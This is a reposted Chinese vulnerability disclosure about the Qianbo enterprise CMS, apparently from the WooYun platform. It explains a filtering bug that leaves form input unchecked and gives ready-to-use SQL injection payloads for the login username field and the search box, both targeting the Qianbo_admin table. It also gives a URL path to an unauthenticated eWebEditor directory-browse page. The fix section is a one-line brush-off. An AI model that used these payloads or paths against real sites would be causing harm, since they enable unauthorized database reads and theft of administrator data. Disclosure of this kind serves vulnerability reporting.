网站地图    收藏   

主页 > 后端 > 网站安全 >

一个防注入的小白错误-千博企业程序 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 千博企业站程序,防注入语句里有一个小白错误!详细说明:If EnableStopInjection = True ThenIf Request.QueryString Then Call StopInjection(Request.QueryString)If Request.Cookies ......

千博企业站程序,防注入语句里有一个小白错误!
详细说明:If EnableStopInjection = True Then
If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
If Request.Cookies <> "" Then Call StopInjection2(Request.Form)
End If
========================
防注入开始还是Encode的,通过Echo他们的解码程序,才发现,这里面把cookie是否空判断两次。造成了Form的恶意字符提交。
漏洞证明:一个鸡肋的前台用户登陆Md5值是1,语句写在用户名里,密码写1
' UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where ''='
 
这个鸡肋的前台登陆只能到达MemberLogin.asp的48行
If UCase(LoginName) = UCase(MemName) And LoginPassword = Password
LoginName取的就是刚刚的那串语句,而查询结果的用户名是1所以卡在了这里
=================================================================
http://www.2cto.com /system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE
后台ewebeditor没有做权限的验证,可导致游客直接浏览
FCK也可列目录用本地的Test连上他们的Fck
===================================================================
搜索框中输入
 
%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='
==================================================================
一堆鸡肋啊。。
修复方案:
 
各种修复啊,你们都懂的!!!
 
作者  B1uH4ck@乌云

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论